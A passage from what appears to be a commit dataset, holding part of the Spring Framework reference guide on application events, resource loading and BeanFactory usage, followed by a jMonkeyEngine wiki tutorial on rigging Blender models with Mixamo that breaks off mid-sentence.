configured for autostart, for example, components that have not already started on\n initialization.\n\n| `ContextStoppedEvent`\n| Published when the `ApplicationContext` is stopped, using the `stop()` method on the\n `ConfigurableApplicationContext` interface. \"Stopped\" here means that all `Lifecycle`\n beans receive an explicit stop signal. A stopped context may be restarted through a\n `start()` call.\n\n| `ContextClosedEvent`\n| Published when the `ApplicationContext` is closed, using the `close()` method on the\n `ConfigurableApplicationContext` interface. \"Closed\" here means that all singleton\n beans are destroyed. A closed context reaches its end of life; it cannot be refreshed\n or restarted.\n\n| `RequestHandledEvent`\n| A web-specific event telling all beans that an HTTP request has been serviced. This\n event is published __after__ the request is complete. This event is only applicable to\n web applications using Spring's `DispatcherServlet`.\n|===\n
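\nFor instance, a minimal sketch of a listener for one of these built-in events might look like this (the class name and comment are invented for illustration):\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class StartupListener implements ApplicationListener<ContextRefreshedEvent> {\n\n\t\tpublic void onApplicationEvent(ContextRefreshedEvent event) {\n\t\t\t\/\/ at this point all beans are loaded and the context is ready for use...\n\t\t}\n\n\t}\n----\n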
\nYou can also create and publish your own custom events. This example demonstrates a\nsimple class that extends Spring's `ApplicationEvent` base class:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class BlackListEvent extends ApplicationEvent {\n\n\t\tprivate final String address;\n\t\tprivate final String test;\n\n\t\tpublic BlackListEvent(Object source, String address, String test) {\n\t\t\tsuper(source);\n\t\t\tthis.address = address;\n\t\t\tthis.test = test;\n\t\t}\n\n\t\t\/\/ accessor and other methods...\n\n\t}\n----\n\nTo publish a custom `ApplicationEvent`, call the `publishEvent()` method on an\n`ApplicationEventPublisher`. Typically this is done by creating a class that implements\n`ApplicationEventPublisherAware` and registering it as a Spring bean. The following\nexample demonstrates such a class:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class EmailService implements ApplicationEventPublisherAware {\n\n\t\tprivate List<String> blackList;\n\t\tprivate ApplicationEventPublisher publisher;\n\n\t\tpublic void setBlackList(List<String> blackList) {\n\t\t\tthis.blackList = blackList;\n\t\t}\n\n\t\tpublic void setApplicationEventPublisher(ApplicationEventPublisher publisher) {\n\t\t\tthis.publisher = publisher;\n\t\t}\n\n\t\tpublic void sendEmail(String address, String text) {\n\t\t\tif (blackList.contains(address)) {\n\t\t\t\tBlackListEvent event = new BlackListEvent(this, address, text);\n\t\t\t\tpublisher.publishEvent(event);\n\t\t\t\treturn;\n\t\t\t}\n\t\t\t\/\/ send email...\n\t\t}\n\n\t}\n----\n\nAt configuration time, the Spring container will detect that `EmailService` implements\n`ApplicationEventPublisherAware` and will automatically call\n`setApplicationEventPublisher()`. In reality, the parameter passed in will be the Spring\ncontainer itself; you're simply interacting with the application context via its\n`ApplicationEventPublisher` interface.\n\nTo receive the custom `ApplicationEvent`, create a class that implements\n`ApplicationListener` and register it as a Spring bean. The following example\ndemonstrates such a class:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class BlackListNotifier implements ApplicationListener<BlackListEvent> {\n\n\t\tprivate String notificationAddress;\n\n\t\tpublic void setNotificationAddress(String notificationAddress) {\n\t\t\tthis.notificationAddress = notificationAddress;\n\t\t}\n\n\t\tpublic void onApplicationEvent(BlackListEvent event) {\n\t\t\t\/\/ notify appropriate parties via notificationAddress...\n\t\t}\n\n\t}\n----\n\nNotice that `ApplicationListener` is generically parameterized with the type of your\ncustom event, `BlackListEvent`. This means that the `onApplicationEvent()` method can\nremain type-safe, avoiding any need for downcasting. You may register as many event\nlisteners as you wish, but note that by default event listeners receive events\nsynchronously. This means the `publishEvent()` method blocks until all listeners have\nfinished processing the event. One advantage of this synchronous and single-threaded\napproach is that when a listener receives an event, it operates inside the transaction\ncontext of the publisher if a transaction context is available.\n
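\nIf you do want events to be delivered asynchronously, one well-known option (not shown in the original example) is to declare a bean named `applicationEventMulticaster` that is backed by a task executor; the executor reference in this sketch is an assumption:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean id=\"applicationEventMulticaster\"\n\t\t\tclass=\"org.springframework.context.event.SimpleApplicationEventMulticaster\">\n\t\t<property name=\"taskExecutor\" ref=\"myTaskExecutor\"\/>\n\t<\/bean>\n----\n\n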
If another strategy for\nevent publication becomes necessary, refer to the JavaDoc for Spring's\n`ApplicationEventMulticaster` interface.\n\nThe following example shows the bean definitions used to register and configure each of\nthe classes above:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean id=\"emailService\" class=\"example.EmailService\">\n\t\t<property name=\"blackList\">\n\t\t\t<list>\n\t\t\t\t<value>known.spammer@example.org<\/value>\n\t\t\t\t<value>known.hacker@example.org<\/value>\n\t\t\t\t<value>john.doe@example.org<\/value>\n\t\t\t<\/list>\n\t\t<\/property>\n\t<\/bean>\n\n\t<bean id=\"blackListNotifier\" class=\"example.BlackListNotifier\">\n\t\t<property name=\"notificationAddress\" value=\"blacklist@example.org\"\/>\n\t<\/bean>\n----\n\nPutting it all together, when the `sendEmail()` method of the `emailService` bean is\ncalled, if there are any emails that should be blacklisted, a custom event of type\n`BlackListEvent` is published. The `blackListNotifier` bean is registered as an\n`ApplicationListener` and thus receives the `BlackListEvent`, at which point it can\nnotify appropriate parties.\n\n[NOTE]\n====\nSpring's eventing mechanism is designed for simple communication between Spring beans\nwithin the same application context. However, for more sophisticated enterprise\nintegration needs, the separately-maintained\nhttp:\/\/projects.spring.io\/spring-integration\/[Spring Integration] project provides\ncomplete support for building lightweight,\nhttp:\/\/www.enterpriseintegrationpatterns.com[pattern-oriented], event-driven\narchitectures that build upon the well-known Spring programming model.\n====\n\n[[context-functionality-events-annotation]]\n==== Annotation-based Event Listeners\n\nAs of Spring 4.2, an event listener can be registered on any public method of a managed\nbean via the `EventListener` annotation. The `BlackListNotifier` can be rewritten as\nfollows:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class BlackListNotifier {\n\n\t\tprivate String notificationAddress;\n\n\t\tpublic void setNotificationAddress(String notificationAddress) {\n\t\t\tthis.notificationAddress = notificationAddress;\n\t\t}\n\n\t\t@EventListener\n\t\tpublic void processBlackListEvent(BlackListEvent event) {\n\t\t\t\/\/ notify appropriate parties via notificationAddress...\n\t\t}\n\n\t}\n----\n\nAs you can see above, the method signature actually _infers_ which event type it listens to. 
This\nalso works for nested generics as long as the actual event resolves the generic parameter you\nwould filter on.\n\nIf your method should listen to several events or if you want to define it with no\nparameter at all, the event type(s) can also be specified on the annotation itself:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@EventListener({ContextStartedEvent.class, ContextRefreshedEvent.class})\n\tpublic void handleContextStart() {\n\n\t}\n----\n\n\nIt is also possible to add additional runtime filtering via the `condition` attribute of the\nannotation that defines a <<expressions,`SpEL` expression>> that should match to actually invoke\nthe method for a particular event.\n\nFor instance, our notifier can be rewritten to be only invoked if the `test` attribute of the\nevent is equal to `foo`:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@EventListener(condition = \"#event.test == 'foo'\")\n\tpublic void processBlackListEvent(BlackListEvent event) {\n\t\t\/\/ notify appropriate parties via notificationAddress...\n\t}\n----\n\nEach `SpEL` expression evaluates against a dedicated context. The next table lists the items made\navailable to the context so one can use them for conditional event processing:\n\n[[context-functionality-events-annotation-tbl]]\n.Event SpEL available metadata\n|===\n| Name| Location| Description| Example\n\n| event\n| root object\n| The actual `ApplicationEvent`\n| `#root.event`\n\n| args\n| root object\n| The arguments (as array) used for invoking the target\n| `#root.args[0]`\n\n| __argument name__\n| evaluation context\n| Name of any of the method arguments. If for some reason the names are not available\n (e.g. no debug information), the argument names are also available under `#a<#arg>`,\n where __#arg__ stands for the argument index (starting from 0).\n| `#iban` or `#a0` (one can also use `#p0` or `#p<#arg>` notation as an alias).\n|===\n\nNote that `#root.event` allows you to access the underlying event, even if your method\nsignature actually refers to an arbitrary object that was published.\n\nIf you need to publish an event as the result of processing another, just change the\nmethod signature to return the event that should be published, something like:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@EventListener\n\tpublic ListUpdateEvent handleBlackListEvent(BlackListEvent event) {\n\t\t\/\/ notify appropriate parties via notificationAddress and\n\t\t\/\/ then publish a ListUpdateEvent...\n\t}\n----\n\nNOTE: This feature is not supported for <<context-functionality-events-async,asynchronous\nlisteners>>.\n\nThis new method will publish a new `ListUpdateEvent` for every `BlackListEvent` handled\nby the method above. If you need to publish several events, just return a `Collection` of\nevents instead.\n\n[[context-functionality-events-async]]\n==== Asynchronous Listeners\n\nIf you want a particular listener to process events asynchronously, simply reuse the\n<<scheduling-annotation-support-async,regular `@Async` support>>:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@EventListener\n\t@Async\n\tpublic void processBlackListEvent(BlackListEvent event) {\n\t\t\/\/ BlackListEvent is processed in a separate thread\n\t}\n----\n\nBe aware of the following limitations when using asynchronous events:\n\n. If the event listener throws an `Exception` it will not be propagated to the caller,\n check `AsyncUncaughtExceptionHandler` for more details.\n. Such an event listener cannot send replies. If you need to send another event as the\n result of the processing, inject `ApplicationEventPublisher` to send the event\n manually, as sketched below.\n
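\nA minimal sketch of that manual-publication workaround might look as follows (the notifier is the annotation-based one from above; the injected-field style and the `ListUpdateEvent` constructor are assumptions of this sketch):\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class BlackListNotifier {\n\n\t\t@Autowired\n\t\tprivate ApplicationEventPublisher publisher;\n\n\t\t@EventListener\n\t\t@Async\n\t\tpublic void processBlackListEvent(BlackListEvent event) {\n\t\t\t\/\/ a return value would be ignored for an asynchronous listener,\n\t\t\t\/\/ so publish the follow-up event explicitly\n\t\t\tpublisher.publishEvent(new ListUpdateEvent(this));\n\t\t}\n\n\t}\n----\n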
\n\n[[context-functionality-events-order]]\n==== Ordering Listeners\n\nIf you need the listener to be invoked before another one, just add the `@Order`\nannotation to the method declaration:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@EventListener\n\t@Order(42)\n\tpublic void processBlackListEvent(BlackListEvent event) {\n\t\t\/\/ notify appropriate parties via notificationAddress...\n\t}\n----\n\n[[context-functionality-events-generics]]\n==== Generic Events\n\nYou may also use generics to further define the structure of your event. Consider an\n`EntityCreatedEvent<T>` where `T` is the type of the actual entity that got created. You\ncan create the following listener definition to only receive `EntityCreatedEvent` for a\n`Person`:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@EventListener\n\tpublic void onPersonCreated(EntityCreatedEvent<Person> event) {\n\t\t...\n\t}\n----\n\n\nDue to type erasure, this will only work if the event that is fired resolves the generic\nparameter(s) on which the event listener filters (that is, something like\n`class PersonCreatedEvent extends EntityCreatedEvent<Person> { ... }`).\n\nIn certain circumstances, this may become quite tedious if all events follow the same\nstructure (as should be the case for the event above). In such a case, you can\nimplement `ResolvableTypeProvider` to _guide_ the framework beyond what the runtime\nenvironment provides:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class EntityCreatedEvent<T>\n\t\t\textends ApplicationEvent implements ResolvableTypeProvider {\n\n\t\tpublic EntityCreatedEvent(T entity) {\n\t\t\tsuper(entity);\n\t\t}\n\n\t\t@Override\n\t\tpublic ResolvableType getResolvableType() {\n\t\t\treturn ResolvableType.forClassWithGenerics(getClass(),\n\t\t\t\t\tResolvableType.forInstance(getSource()));\n\t\t}\n\t}\n----\n\n[TIP]\n====\nThis works not only for `ApplicationEvent` but any arbitrary object that you'd send as\nan event.\n====\n\n\n\n[[context-functionality-resources]]\n=== Convenient access to low-level resources\n\nFor optimal usage and understanding of application contexts, users should generally\nfamiliarize themselves with Spring's `Resource` abstraction, as described in the chapter\n<<resources>>.\n\nAn application context is a `ResourceLoader`, which can be used to load ``Resource``s. A\n`Resource` is essentially a more feature-rich version of the JDK class `java.net.URL`.\nIn fact, the implementations of `Resource` wrap an instance of `java.net.URL` where\nappropriate. A `Resource` can obtain low-level resources from almost any location in a\ntransparent fashion, including from the classpath, a filesystem location, anywhere\ndescribable with a standard URL, and some other variations. If the resource location\nstring is a simple path without any special prefixes, where those resources come from is\nspecific and appropriate to the actual application context type.\n\nYou can configure a bean deployed into the application context to implement the special\ncallback interface, `ResourceLoaderAware`, to be automatically called back at\ninitialization time with the application context itself passed in as the\n`ResourceLoader`. You can also expose properties of type `Resource`, to be used to\naccess static resources; they will be injected like any other properties. You\ncan specify those `Resource` properties as simple String paths, and rely on a special\nJavaBean `PropertyEditor` that is automatically registered by the context, to convert\nthose text strings to actual `Resource` objects when the bean is deployed.\n
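\nA minimal sketch of such a configuration might look like this (the bean class, property name, and resource path are invented for illustration):\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean id=\"myBean\" class=\"example.MyBean\">\n\t\t<!-- the String is converted to a Resource by the registered PropertyEditor -->\n\t\t<property name=\"template\" value=\"classpath:config\/templates\/myTemplate.txt\"\/>\n\t<\/bean>\n----\n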
\nThe location path or paths supplied to an `ApplicationContext` constructor are actually\nresource strings, and in simple form are treated appropriately to the specific context\nimplementation. `ClassPathXmlApplicationContext` treats a simple location path as a\nclasspath location. You can also use location paths (resource strings) with special\nprefixes to force loading of definitions from the classpath or a URL, regardless of the\nactual context type.\n\n\n\n[[context-create]]\n=== Convenient ApplicationContext instantiation for web applications\n\nYou can create `ApplicationContext` instances declaratively by using, for example, a\n`ContextLoader`. Of course you can also create `ApplicationContext` instances\nprogrammatically by using one of the `ApplicationContext` implementations.\n\nYou can register an `ApplicationContext` using the `ContextLoaderListener` as follows:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<context-param>\n\t\t<param-name>contextConfigLocation<\/param-name>\n\t\t<param-value>\/WEB-INF\/daoContext.xml \/WEB-INF\/applicationContext.xml<\/param-value>\n\t<\/context-param>\n\n\t<listener>\n\t\t<listener-class>org.springframework.web.context.ContextLoaderListener<\/listener-class>\n\t<\/listener>\n----\n\nThe listener inspects the `contextConfigLocation` parameter. If the parameter does not\nexist, the listener uses `\/WEB-INF\/applicationContext.xml` as a default. When the\nparameter __does__ exist, the listener separates the String by using predefined\ndelimiters (comma, semicolon and whitespace) and uses the values as locations where\napplication contexts will be searched. Ant-style path patterns are supported as well.\nExamples are `\/WEB-INF\/{asterisk}Context.xml` for all files with names ending with \"Context.xml\",\nresiding in the \"WEB-INF\" directory, and `\/WEB-INF\/**\/*Context.xml`, for all such files\nin any subdirectory of \"WEB-INF\".\n\n\n\n[[context-deploy-rar]]\n=== Deploying a Spring ApplicationContext as a Java EE RAR file\n\nIt is possible to deploy a Spring ApplicationContext as a RAR file, encapsulating the\ncontext and all of its required bean classes and library JARs in a Java EE RAR deployment\nunit. This is the equivalent of bootstrapping a standalone ApplicationContext, just hosted\nin a Java EE environment, with the ability to access the Java EE server's facilities. RAR deployment\nis a more natural alternative to the scenario of deploying a headless WAR file, in effect, a WAR\nfile without any HTTP entry points that is used only for bootstrapping a Spring\nApplicationContext in a Java EE environment.\n\nRAR deployment is ideal for application contexts that do not need HTTP entry points but\nrather consist only of message endpoints and scheduled jobs. Beans in such a context can\nuse application server resources such as the JTA transaction manager and JNDI-bound JDBC\nDataSources and JMS ConnectionFactory instances, and may also register with the\nplatform's JMX server - all through Spring's standard transaction management and JNDI\nand JMX support facilities. 
Application components can also interact with the\napplication server's JCA WorkManager through Spring's `TaskExecutor` abstraction.\n\nCheck out the JavaDoc of the\n{api-spring-framework}\/jca\/context\/SpringContextResourceAdapter.html[`SpringContextResourceAdapter`]\nclass for the configuration details involved in RAR deployment.\n\n__For a simple deployment of a Spring ApplicationContext as a Java EE RAR file:__ package\nall application classes into a RAR file, which is a standard JAR file with a different\nfile extension. Add all required library JARs into the root of the RAR archive. Add a\n\"META-INF\/ra.xml\" deployment descriptor (as shown in ``SpringContextResourceAdapter``s\nJavaDoc) and the corresponding Spring XML bean definition file(s) (typically\n\"META-INF\/applicationContext.xml\"), and drop the resulting RAR file into your\napplication server's deployment directory.\n\n[NOTE]\n====\nSuch RAR deployment units are usually self-contained; they do not expose components to\nthe outside world, not even to other modules of the same application. Interaction with a\nRAR-based ApplicationContext usually occurs through JMS destinations that it shares with\nother modules. A RAR-based ApplicationContext may also, for example, schedule some jobs,\nreacting to new files in the file system (or the like). If it needs to allow synchronous\naccess from the outside, it could, for example, export RMI endpoints, which of course may\nbe used by other application modules on the same machine.\n====\n\n\n\n\n[[beans-beanfactory]]\n== The BeanFactory\nThe `BeanFactory` provides the underlying basis for Spring's IoC functionality but it is\nonly used directly in integration with other third-party frameworks and is now largely\nhistorical in nature for most users of Spring. The `BeanFactory` and related interfaces,\nsuch as `BeanFactoryAware`, `InitializingBean`, `DisposableBean`, are still present in\nSpring for the purposes of backward compatibility with the large number of third-party\nframeworks that integrate with Spring. Often, such third-party components cannot use\nmore modern equivalents such as `@PostConstruct` or `@PreDestroy`, because they need to remain\ncompatible with JDK 1.4 or to avoid a dependency on JSR-250.\n\nThis section provides additional background into the differences between the\n`BeanFactory` and `ApplicationContext` and how one might access the IoC container\ndirectly through a classic singleton lookup.\n\n\n\n[[context-introduction-ctx-vs-beanfactory]]\n=== BeanFactory or ApplicationContext?\n\nUse an `ApplicationContext` unless you have a good reason for not doing so.\n\nBecause the `ApplicationContext` includes all functionality of the `BeanFactory`, it is\ngenerally recommended over the `BeanFactory`, except for a few situations such as in\nembedded applications running on resource-constrained devices where memory consumption\nmight be critical and a few extra kilobytes might make a difference. However, for\nmost typical enterprise applications and systems, the `ApplicationContext` is what you\nwill want to use. Spring makes __heavy__ use of the <<beans-factory-extension-bpp,\n`BeanPostProcessor` extension point>> (to effect proxying and so on). If you use only a\nplain `BeanFactory`, a fair amount of support such as transactions and AOP will not take\neffect, at least not without some extra steps on your part. 
This situation could be\nconfusing because nothing is actually wrong with the configuration.\n\nThe following table lists features provided by the `BeanFactory` and\n`ApplicationContext` interfaces and implementations.\n\n[[context-introduction-ctx-vs-beanfactory-feature-matrix]]\n.Feature Matrix\n|===\n| Feature| `BeanFactory`| `ApplicationContext`\n\n| Bean instantiation\/wiring\n| Yes\n| Yes\n\n| Automatic `BeanPostProcessor` registration\n| No\n| Yes\n\n| Automatic `BeanFactoryPostProcessor` registration\n| No\n| Yes\n\n| Convenient `MessageSource` access (for i18n)\n| No\n| Yes\n\n| `ApplicationEvent` publication\n| No\n| Yes\n|===\n\nTo explicitly register a bean post-processor with a `BeanFactory` implementation,\nyou need to write code like this:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tDefaultListableBeanFactory factory = new DefaultListableBeanFactory();\n\t\/\/ populate the factory with bean definitions\n\n\t\/\/ now register any needed BeanPostProcessor instances\n\tMyBeanPostProcessor postProcessor = new MyBeanPostProcessor();\n\tfactory.addBeanPostProcessor(postProcessor);\n\n\t\/\/ now start using the factory\n----\n\nTo explicitly register a `BeanFactoryPostProcessor` when using a `BeanFactory`\nimplementation, you must write code like this:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tDefaultListableBeanFactory factory = new DefaultListableBeanFactory();\n\tXmlBeanDefinitionReader reader = new XmlBeanDefinitionReader(factory);\n\treader.loadBeanDefinitions(new FileSystemResource(\"beans.xml\"));\n\n\t\/\/ bring in some property values from a Properties file\n\tPropertyPlaceholderConfigurer cfg = new PropertyPlaceholderConfigurer();\n\tcfg.setLocation(new FileSystemResource(\"jdbc.properties\"));\n\n\t\/\/ now actually do the replacement\n\tcfg.postProcessBeanFactory(factory);\n----\n\nIn both cases, the explicit registration step is inconvenient, which is one reason why\nthe various `ApplicationContext` implementations are preferred over plain `BeanFactory`\nimplementations in the vast majority of Spring-backed applications, especially when\nusing ``BeanFactoryPostProcessor``s and ``BeanPostProcessor``s. These mechanisms implement\nimportant functionality such as property placeholder replacement and AOP.\n\n\n\n[[beans-servicelocator]]\n=== Glue code and the evil singleton\n\nIt is best to write most application code in a dependency-injection (DI) style, where\nthat code is served out of a Spring IoC container, has its own dependencies supplied by\nthe container when it is created, and is completely unaware of the container. However,\nfor the small glue layers of code that are sometimes needed to tie other code together,\nyou sometimes need singleton (or quasi-singleton) style access to a Spring IoC\ncontainer. For example, third-party code may try to construct new objects directly (\n`Class.forName()` style), without the ability to get these objects out of a Spring IoC\ncontainer. If the object constructed by the third-party code is a small stub or proxy,\nwhich then uses singleton-style access to a Spring IoC container to get a real object\nto delegate to, then inversion of control has still been achieved for the majority of\nthe code (the object coming out of the container). Thus most code is still unaware of\nthe container or how it is accessed, and remains decoupled from other code, with all\nensuing benefits. 
EJBs may also use this stub\/proxy approach to delegate to a plain Java\nimplementation object, retrieved from a Spring IoC container. While the Spring IoC\ncontainer itself ideally does not have to be a singleton, it may be unrealistic in terms\nof memory usage or initialization times (when using beans in the Spring IoC container\nsuch as a Hibernate `SessionFactory`) for each bean to use its own, non-singleton Spring\nIoC container.\n\nLooking up the application context in a service locator style is sometimes the only\noption for accessing shared Spring-managed components, such as in an EJB 2.1\nenvironment, or when you want to share a single ApplicationContext as a parent to\nWebApplicationContexts across WAR files. In this case you should look into using the\n{api-spring-framework}\/context\/access\/ContextSingletonBeanFactoryLocator.html[`ContextSingletonBeanFactoryLocator`]\nutility class, which is described in this\nhttps:\/\/spring.io\/blog\/2007\/06\/11\/using-a-shared-parent-application-context-in-a-multi-war-spring-application\/[Spring\nteam blog entry].\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"bb69ff0adb524fc1de568f5b7e2493d80eb006b8","subject":"Update mixamo.adoc","message":"Update mixamo.adoc","repos":"jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org","old_file":"src\/docs\/asciidoc\/jme3\/advanced\/mixamo.adoc","new_file":"src\/docs\/asciidoc\/jme3\/advanced\/mixamo.adoc","new_contents":"= Mixamo Animation\n:author: \n:revnumber: \n:revdate: 2017\/05\/25 13:04\n:relfileprefix: ..\/..\/\n:imagesdir: ..\/..\n:experimental:\nifdef::env-github,env-browser[:outfilesuffix: .adoc]\n\n\n[NOTE]\n====\nIn the near future the Mixamo website will be undergoing some changes that will have some level of effect upon how you animate your character. The only real difference that Adobe says will happen, with respect to auto-rigging your characters, is that you will no longer be able to store the assets on the Mixamo website. See this link:http:\/\/blogs.adobe.com\/adobecare\/2017\/05\/23\/download-assets-from-mixamo\/[notice] for more info.\n====\n\n== Using Mixamo For Model Animation\n\nWith very little effort, you can use Adobe's Mixamo to fully animate your Blender models. Once you understand the process, that is. This guide uses link:https:\/\/www.blender.org\/download\/[Blender version 2.78c] with its default settings along with the Ogre exporter 0.6.0 found <<jme3\/advanced\/ogrecompatibility.html,here>>. You will need to have FBX file Importing and Exporting initialized in Blender. This can be found under `menu:File[User Preferences > Add-ons]` in the Info header at the top of the program. Be sure to toggle btn:[Auto Run Python Scripts] in the `menu:User Preferences[File]` tab.\n\n== Prepare to Export\n\nTo properly animate your models, there are a few rules you must follow.\n\n* Read the link:https:\/\/community.mixamo.com\/hc\/en-us\/articles\/210310918-Auto-Rigger-Troubleshooting[Auto-Rig Error Troubleshooting] guide before you do anything else.\n\n* Clean up your Blender file before exporting. This means you have a game-ready model that will become the base for all your animations. 
The following checklist is provided for your convenience.\n[% interactive]\n- [ ] You have no Animations.\n- [ ] You have no Actions stored in the Dope Sheet Action Editor btn:[Browse Action to be linked] buffer.\n- [ ] You have UV Mapped your model.\n- [ ] You have one Material named the same as your mesh.\n- [ ] You have baked and packed your Texture (i.e., you're using a texture atlas).\n- [ ] You have cleared the UV, Material and Texture buffers of unused images, materials and textures.\n- [ ] You have applied the Location, Rotation, and Scale to your model.\n- [ ] *MOST IMPORTANT OF ALL*, in the `menu:Properties Panel[Scene Tab > Unit Panel]` set the btn:[Unit of Measure] to Meters and the Length to Metric. Adobe uses centimeters for the FBX exporter, and if this is not set the model's scale will be unusual, to say the least. Besides that, JME3 uses 1 WU = 1 Meter, so this will keep things consistent. If you are doing this now, you may have to rescale your model before proceeding.\n\n\n== Export\n\n\n.Blender\n. In the 3D viewport, select your model; it will be highlighted in orange.\n. In the `Info` header at the top of the program, select `menu:File[Export > FBX]`.\n\n.FBX Exporter\n. Enter a file path to export to, usually the same directory as your `.blend` file for simplicity.\n. Enter a file name.\n. In the `Export FBX` panel, located in the bottom left of the open window, under the `Main` tab, toggle on the checkbox `Selected Objects`.\n. Leave the `Scale` at 1 but click the button next to it to turn off btn:[Scale all data]. Failure to do so will destroy the scale of your model. If the button is selected, it will be dark in color.\n. Leave the `Forward` and `Up` axis at the default of `-Z Forward` and `Y Up`.\n. Under `Which kind of object to export` deselect everything but `Mesh`. \n. Under the `Geometries` tab, select `Apply Modifiers`.\n. When you are done, click the btn:[Export FBX] button to export the file.\n\n\n== Import\n\n\n.Mixamo\n. Create a link:https:\/\/www.mixamo.com\/[Mixamo] account and log in.\n. Navigate to your `My Assets` directory.\n. Select `Upload`.\n. Navigate to the file to be uploaded or drag and drop it onto the file uploader.\n\n\n== Auto-Rigger\n\n\nIf everything went well, the `Auto-Rigger` will open and your model will be facing you. If not, fix your model in Blender before proceeding. \n\n. If the model is facing you, click btn:[Next].\n. In this panel you will rig your model. Place the markers as shown in the image. \n+\n[NOTE]\n====\nRemember that the model is facing you, so its right is on your left.\n====\n\n. Select the LOD you are after. This is based on how many bones you want the hand of the model to have. Feel free to cycle through the options to see what each one does.\n. When you are through, click the btn:[Next] button to rig your model.\n+\n[NOTE]\n====\nThis may take some time, and if the model does not appear within 2 minutes something has gone wrong and you will have to restart the upload process. This is a trailblazing process, so keep that in mind. \n====\n\nWhen the model appears, click through to the end of the process.\n\n\n== Download\n\n\nNavigate to `My Assets`. You should now see your model in a TPose position. This will be your base model for all animations. We will also use it as our newly rigged model for Blender.\n\n. Select the TPose model and then click the btn:[Queue Download] button.\n. In the `Download Settings` dialog, the `Format` is FBX and `Pose` is TPose.\n. 
Click the btn:[Queue Download] button.\n\nAfter the file is ready, it will be in your `Downloads` directory on Mixamo.\n\nClick the btn:[Queue Download] button under `Status`, rename the file to TPose, and save it to your computer, preferably in the same directory as your Blender file.\n\n\n== Preparing Blender for Animations\n\n\nBefore you can import any animations from Mixamo, you should have a file that is separate from the model file you exported earlier. Although it's not required, it's best to do so. Things can go wrong, and you don't want to destroy your model file by accident, so it's always best to keep things separate. With that said, let's begin.\n\n.Blender\n. In the `Info` header at the top of the program, select `menu:File[New > Reload Startup]`.\n. Select the default cube and delete it.\n. In the `Properties Panel`, located at the bottom right, select the `Scene` tab. In the `Units` panel, change the `Units of measure` to `Meters` and `Length` to `Metric`.\n\n[TIP]\n====\nYou should create and save a default startup file in Blender: `menu:File[Save Startup File]`. This way you will not have to constantly redo things. Setting your `Units of measure` is the first thing you should do. You can always restore the default startup file by selecting `menu:File[Load Factory Settings]` at any time.\n====\n","old_contents":"= Mixamo Animation\n:author: \n:revnumber: \n:revdate: 2017\/05\/25 13:04\n:relfileprefix: ..\/..\/\n:imagesdir: ..\/..\n:experimental:\nifdef::env-github,env-browser[:outfilesuffix: .adoc]\n\n\n[NOTE]\n====\nIn the near future the Mixamo website will be undergoing some changes that will have some level of effect upon how you animate your character. The only real difference that Adobe says will happen, with respect to auto-rigging your characters, is you no longer can store the assets on the Mixamo website. See this link:http:\/\/blogs.adobe.com\/adobecare\/2017\/05\/23\/download-assets-from-mixamo\/[notice] for more info.\n====\n\n== Using Mixamo For Model Animation\n\nWith very little effort, you can use Adobes Mixamo to fully animate your Blender models. Once you understand the process that is. This guide uses link:https:\/\/www.blender.org\/download\/[Blender version 2.78c] with its default settings along with the Ogre exporter 0.6.0 found <<jme3\/advanced\/ogrecompatibility.html,here>>. You will need to have FBX file Importing and Exporting initialized in Blender. This can be found under `menu:File[User Preferences > Add-ons]` in the Info header at the top of the program. Be sure to toggle btn:[Auto Run Python Scripts] in the `menu:User Preferences[File]` tab.\n\n== Prepare to Export\n\nTo properly animate your models there are a few rules you must follow.\n\n* Read the link:https:\/\/community.mixamo.com\/hc\/en-us\/articles\/210310918-Auto-Rigger-Troubleshooting[Auto-Rig Error Troubleshooting] guide before you do anything else.\n\n* Clean up your Blender file before exporting. This means you have a game ready model that will become the base for all your animations. 
The following checklist is provided for your convienence.\n[% interactive]\n- [ ] You have no Animations.\n- [ ] You have no Actions stored in the Dope Sheet Action Editor btn:[Browse Action to be linked] buffer.\n- [ ] You have UV Mapped your model.\n- [ ] You have one Material named the same as your mesh.\n- [ ] You have baked and packed your Texture (ie, your using a texture atlas).\n- [ ] You have cleared the UV, Material and Texture buffers of unused images, materials and textures.\n- [ ] You have applied the Location, Rotation, and Scale to your model.\n- [ ] *MOST IMPORTANT OF ALL*, in the `menu:Properties Panel[Scene Tab > Unit Panel]` set the btn:[Unit of Measure] to Meters and the Length to Metric. Adobe uses centimeters for the FBX exporter and if this is not set the models scale will be unusual to say the least. Besides that, JME3 uses 1 WU = 1 Meter so this will keep things consistant. If you are doing this now, you may have to rescale your model before proceding.\n\n\n== Export\n\n\n.Blender\n. In the 3d viewport select your model, it will be high-lighted in orange.\n. In the `Info` header at the top of the program select `menu:File[Export > FBX]`.\n\n.FBX Exporter\n. Enter a file path to export to, usually the same directory as your `.blend` file for simplicity.\n. Enter a file name.\n. In the `Export FBX` panel, located in the bottom left of the open window, under the `Main` tab, toggle on the checkbox `Selected Objects`.\n. Leave the `Scale` at 1 but click the button next to it to turn off btn:[Scale all data]. Failure to do so will destroy the 